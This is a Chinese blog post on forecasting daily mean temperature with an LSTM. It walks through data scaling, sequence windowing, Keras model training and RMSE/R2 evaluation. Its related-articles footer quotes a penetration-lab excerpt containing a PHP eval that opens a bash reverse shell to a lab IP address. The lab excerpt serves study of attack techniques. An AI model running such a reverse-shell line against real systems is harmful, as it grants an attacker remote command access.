基于LSTM的温度时序预测

news2024/11/15 3:38:12

1.背景

本文接【时序预测SARIMAX模型】 一文,采用LSTM模型进行平均温度数据预测。具体的背景和数据分析就不做重复说明,感兴趣可以去看上文即可。

2.LSTM模型

RNN(Recurrent Neural Network,循环神经网络)是一种特殊的神经网络,被广泛应用于序列数据的建模和预测,如自然语言处理、语音识别、时间序列预测等领域。RNN对时间序列的数据有着强大的提取能力,也被称作记忆能力。相对于传统的前馈神经网络,RNN具有循环连接,可以将前一时刻的输出作为当前时刻的输入,从而使得网络可以处理任意长度的序列数据,捕捉序列数据中的长期依赖关系。

图 1

LSTM(Long Short-Term Memory,长短时记忆网络)是一种特殊的 RNN,它通过引入门控机制和记忆单元等结构来增强 RNN 的记忆能力和表达能力。

LSTM 的基本结构包括一个循环单元和三个门控单元:输入门、遗忘门和输出门。循环单元接受当前时刻的输入和前一时刻的输出作为输入,并输出当前时刻的输出和传递到下一时刻的状态。输入门控制当前时刻的输入对状态的影响,遗忘门控制前一时刻的状态对当前状态的影响,输出门控制当前状态对输出的影响。记忆单元则用于存储和传递长期的信息。基于此,使得LSTM具有长期的记忆能力,并且具有防止梯度消失的特点,故我们选择LSTM作为库存预估模型的训练基础。

图 2

3.模型训练

3.1 查看数据信息

df.info()

<class ‘pandas.core.frame.DataFrame’>
DatetimeIndex: 1462 entries, 2013-01-01 to 2017-01-01
Data columns (total 9 columns):
# Column Non-Null Count Dtype
->-- ------ -------------- -----
0 meantemp 1462 non-null float64
1 humidity 1462 non-null float64
2 wind_speed 1462 non-null float64
3 meanpressure 1462 non-null float64
4 year 1462 non-null int32
5 month 1462 non-null int32
6 day 1462 non-null int32
7 dayofweek 1462 non-null int32
8 date 1462 non-null object
dtypes: float64(4), int32(4), object(1)
memory usage: 91.4+ KB

3.2 数据分析

从【时序预测SARIMAX模型】 中可以看到温度数据具有明显的周期特征,因此需要考虑做归一化。

from sklearn.preprocessing import RobustScaler, MinMaxScaler

robust_scaler = RobustScaler()   # scaler for wind_speed
minmax_scaler = MinMaxScaler()  # scaler for humidity
target_transformer = MinMaxScaler() 

dl_train['wind_speed'] = robust_scaler.fit_transform(dl_train[['wind_speed']])  # robust for wind_speed
dl_train['humidity'] = minmax_scaler.fit_transform(dl_train[['humidity']]) # minmax for humidity
dl_train['meantemp'] = target_transformer.fit_transform(dl_train[['meantemp']]) # target

dl_test['wind_speed'] = robust_scaler.transform(dl_test[['wind_speed']])
dl_test['humidity'] = minmax_scaler.transform(dl_test[['humidity']])
dl_test['meantemp'] = target_transformer.transform(dl_test[['meantemp']])

display(df.head())
display(dl_train.head())

图 3

3.3 数据准备

from tensorflow.keras.models import Sequential
from tensorflow.keras.callbacks import EarlyStopping

def create_dataset(X, y, time_steps=1):  
    Xs, ys = [], []   
    for i in range(len(X) - time_steps):   
        v = X.iloc[i:(i + time_steps)].values 
        Xs.append(v)      
        ys.append(y.iloc[i + time_steps])
    return np.array(Xs), np.array(ys)  

sequence_length = 3  # adjust based on your dataset and experimentation
X_train, y_train = create_dataset(dl_train, dl_train['meantemp'], sequence_length)
X_test, y_test = create_dataset(dl_test, dl_test['meantemp'], sequence_length)

3.4 构建模型及评估

from tensorflow.keras.layers import LSTM,Dropout,Dense

# Build the LSTM model
lstm_model = Sequential()
lstm_model.add(LSTM(100, activation='tanh', input_shape=(sequence_length, X_train.shape[2])))
# lstm_model.add(LSTM(128, activation='softsign', input_shape=(sequence_length, X_train.shape[2])))
lstm_model.add(Dropout(0.5))
lstm_model.add(Dense(1))
lstm_model.compile(optimizer='adam', loss='mse')

# Define early stopping callback
early_stopping = EarlyStopping(monitor='val_loss', patience=10, restore_best_weights=True)

# Train the model
history = lstm_model.fit(X_train, y_train, epochs=30, validation_data=(X_test, y_test), batch_size=1, callbacks=[early_stopping])

# Evaluate the model
loss = lstm_model.evaluate(X_test, y_test)
print(f'Validation Loss: {loss}')
lstm_model.summary()

图 4

3.5 模型预测

# Make predictions
lstm_pred = lstm_model.predict(X_test)
lstm_pred = target_transformer.inverse_transform(lstm_pred)  # Inverse transform to original scale

# Inverse transform the true values for comparison
y_test = y_test.reshape(-1, 1)
y_test = target_transformer.inverse_transform(y_test)

3.6 模型评估

# Calculate RMSE and R2 scores
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error

rmse = np.sqrt(mean_squared_error(y_test, lstm_pred))
r2 = r2_score(y_test, lstm_pred)

print(f'RMSE: {rmse}')
print(f'R2 Score: {r2}')

# Plot the results
plt.figure(figsize=(14, 7))
plt.plot(df.index[-len(y_test):], y_test, label='True Values')
plt.plot(df.index[-len(y_test):], lstm_pred, label='Predictions', linestyle='dashed')
plt.xlabel('Date')
plt.ylabel('Mean Temperature')
plt.title('Mean Temperature Predictions vs True Values')
plt.legend()
plt.show()

# Get training and validation losses from history
training_loss = history.history['loss']
validation_loss = history.history['val_loss']

# Plot loss values over epochs
plt.plot(training_loss, label='Training Loss')
plt.plot(validation_loss, label='Validation Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss (MSE)')
plt.title('Training and Validation Loss')
plt.legend()
plt.show()

图 5

图 6

从结果看,模型拟合的效果还可以,相比于模型默认参数,做了一些参数调教,比如网络层数、激活函数以及Dropout等,还有一些参数尝试过调整,效果都一般,主要是对比不同参数下RMSE和R2两个值。后续出一些关于模型调参的文章,本文完。

参考文档

  1. https://colah.github.io/posts/2015-08-Understanding-LSTMs/
  2. https://www.kaggle.com/code/kevintinker1/time-series-forecasting-with-lstm
  3. 携程基于LSTM的广告库存预估算法

如有侵权,烦请联系删除

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2154795.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AI驱动TDSQL-C Serverless 数据库技术实战营-ai学生选课系统数据分析

以前用过腾讯的TDSQL-MYSQL&#xff0c;TBASE&#xff0c;最近了解到TDSQL-C serverless&#xff0c;本次试验结合的AI大模型驱动来学习实战TDSQL-C serverless&#xff0c;体验服务化的数据库&#xff0c;和一句简单描述进行学生选课系统数据分析&#xff1b; 我使用的分析数据…

C++初阶-list用法总结

目录 1.迭代器的分类 2.算法举例 3.push_back/emplace_back 4.insert/erase函数介绍 5.splice函数介绍 5.1用法一&#xff1a;把一个链表里面的数据给另外一个链表 5.2 用法二&#xff1a;调整链表当前的节点数据 6.unique去重函数介绍 1.迭代器的分类 我们的这个迭代器…

【alluxio编译报错】Some files do not have the expected license header

Some files do not have the expected license header 快捷导航 在开始解决问题之前&#xff0c;大家可以通过下面的导航快速找到相关资源啦&#xff01;&#x1f4a1;&#x1f447; 快捷导航链接地址备注相关文档-ambaribigtop自定义组件集成https://blog.csdn.net/TTBIGDA…

【Elasticsearch系列十八】Ik 分词器

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

通信入门系列书籍推荐一:通信原理和通信原理学习辅导

微信公众号上线&#xff0c;搜索公众号小灰灰的FPGA,关注可获取相关源码&#xff0c;定期更新有关FPGA的项目以及开源项目源码&#xff0c;包括但不限于各类检测芯片驱动、低速接口驱动、高速接口驱动、数据信号处理、图像处理以及AXI总线等 本节目录 一、背景 二、通信原理 …

石岩体育馆附近的免费停车场探寻

坐标&#xff1a;石岩体育馆侧的石清大道断头路, 如果运气好的话&#xff0c;遇到刚好有车开出的话&#xff0c;我觉得可以作为中长期的免费停车点 第一次路过的时候&#xff0c;把我震惊了&#xff0c;我一直以为石岩停车位紧张比市区还严重&#xff0c;因为石岩大部分为统建楼…

python画图|图像背景颜色设置

python画图出来的默认图形背景是白色&#xff0c;有时候并不适合大家表达想要表达的意思。 因此&#xff0c;我们很有必要掌握自己设置图形背景颜色的技巧。 【1】官网教程 首先请各位看官移步官网&#xff0c;看看官网如何设置&#xff0c;下述链接可轻松到达&#xff1a; …

Lubuntu电源管理

lxqt-config-powermanagement 打开托盘图标 Show icon 电源管理 电源管理管理笔记本电脑电池的低电量、关闭笔记本电脑盖的操作以及计算机长时间闲置时应采取的措施。 用法 LXQt 电源管理会监控您的电池、笔记本电脑盖、空闲情况&#xff0c;以及当您按下电源或睡眠按钮时会发…

IS-ISv6单拓扑存在的问题

文章目录 IS-ISv6单拓扑配置单拓扑存在的问题解决 IS-ISv6单拓扑B站视频传送门 IS-ISv6单拓扑 配置 R1&#xff1a;sy sy R1 ipv6 inter g0/0/0 ip add 12.1.1.1 24 ipv6 enable ipv add 2001:12::1 64 inter loop0 ip add 1.1.1.1 32 ipv6 enable ipv address 2002::1 128isi…

30个GPT提示词天花板,一小时从大纲到终稿

PROMPT 1 中文&#xff1a;构建研究背景与意义&#xff0c;阐述研究问题的紧迫性和重要性。 English: Establish the research background and significance, elucidating the urgency and importance of the research question. 中文&#xff1a;设计研究目的与目标&#xff…

TDOA方法求二维坐标的MATLAB代码演示与讲解

引言 时间差定位(Time Difference of Arrival, TDOA)是一种用于确定信号源位置的技术,广泛应用于无线通信、声学定位等领域。通过测量信号到达多个接收器的时间差,可以计算出信号源的二维坐标。本文将通过MATLAB代码演示如何使用TDOA方法来求解二维坐标。 TDOA原理 TDOA…

LeetCode题练习与总结:回文链表--234

一、题目描述 给你一个单链表的头节点 head &#xff0c;请你判断该链表是否为回文链表。如果是&#xff0c;返回 true &#xff1b;否则&#xff0c;返回 false 。 示例 1&#xff1a; 输入&#xff1a;head [1,2,2,1] 输出&#xff1a;true示例 2&#xff1a; 输入&#x…

CocosCreator 3.x 实现角色移动与加载时动态屏幕边缘检测

效果 思路 通过cc.view全局单例 View 对象获取屏幕尺寸加载时根据屏幕尺寸动态计算上下左右边缘 代码实现 import { _decorator, Component, EventTouch, Input, input, Node, view } from cc; const { ccclass, property } _decorator;/*** 玩家控制脚本*/ ccclass(Player…

Linux之实战命令03:stat应用实例(三十七)

简介&#xff1a; CSDN博客专家、《Android系统多媒体进阶实战》一书作者 新书发布&#xff1a;《Android系统多媒体进阶实战》&#x1f680; 优质专栏&#xff1a; Audio工程师进阶系列【原创干货持续更新中……】&#x1f680; 优质专栏&#xff1a; 多媒体系统工程师系列【…

树及二叉树(选择题)

树 在树中&#xff0c;总结点数为所有结点的度和再加一 5、设一棵度为3的树&#xff0c;其中度为2&#xff0c;1.0的结点数分别为3&#xff0c;1&#xff0c;6。该树中度为3 的结点数为_。 二叉树 设二叉树的所有节点个数为N&#xff0c;度为零的结点&#xff08;叶子结点…

P9235 [蓝桥杯 2023 省 A] 网络稳定性

*原题链接* 最小瓶颈生成树题&#xff0c;和货车运输完全一样。 先简化题意&#xff0c; 次询问&#xff0c;每次给出 &#xff0c;问 到 的所有路径集合中&#xff0c;最小边权的最大值。 对于这种题可以用kruskal生成树来做&#xff0c;也可以用倍增来写&#xff0c;但不…

数字基带之相移键控PSK

1 相移键控定义 相移键控是指用载波的相移位变化来传递信号&#xff0c;不改变载波的幅度和频率&#xff0c;可用下面的公式表示。 是载波的幅度&#xff0c;是载波的角频率&#xff0c;是载波的瞬时相位&#xff0c;是载波的初始相位。如果需要调制的信号为1bit的二进制数&am…

spark读取数据性能提升

1. 背景 spark默认的jdbc只会用单task读取数据&#xff0c;读取大数据量时&#xff0c;效率低。 2. 解决方案 根据分区字段&#xff0c;如日期进行划分&#xff0c;增加task数量提升效率。 /*** 返回每个task按时间段划分的过滤语句* param startDate* param endDate* param …

[Web安全 网络安全]-CSRF跨站请求伪造

文章目录&#xff1a; 一&#xff1a;前言 1.定义 2.攻击原理 3.危害 4.环境 4.1 靶场 4.2 扫描工具 5.cookie session token的区别 6.CSRF与XSS的区别 二&#xff1a;构建CSRF的payload GET请求&#xff1a;a标签 img标签 POST请求&#xff1a;form表单 三&…

Prime1 靶机渗透 ( openssl 解密 ,awk 字符串处理,信息收集)

简介 Prime1 的另一种解法 起步 从初级shell开始 反弹 shell 路径 http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php 其内的 shell 为 <?php eval("/bin/bash -c bash -i >& /dev/tcp/192.168.50.147/443 0>&1"…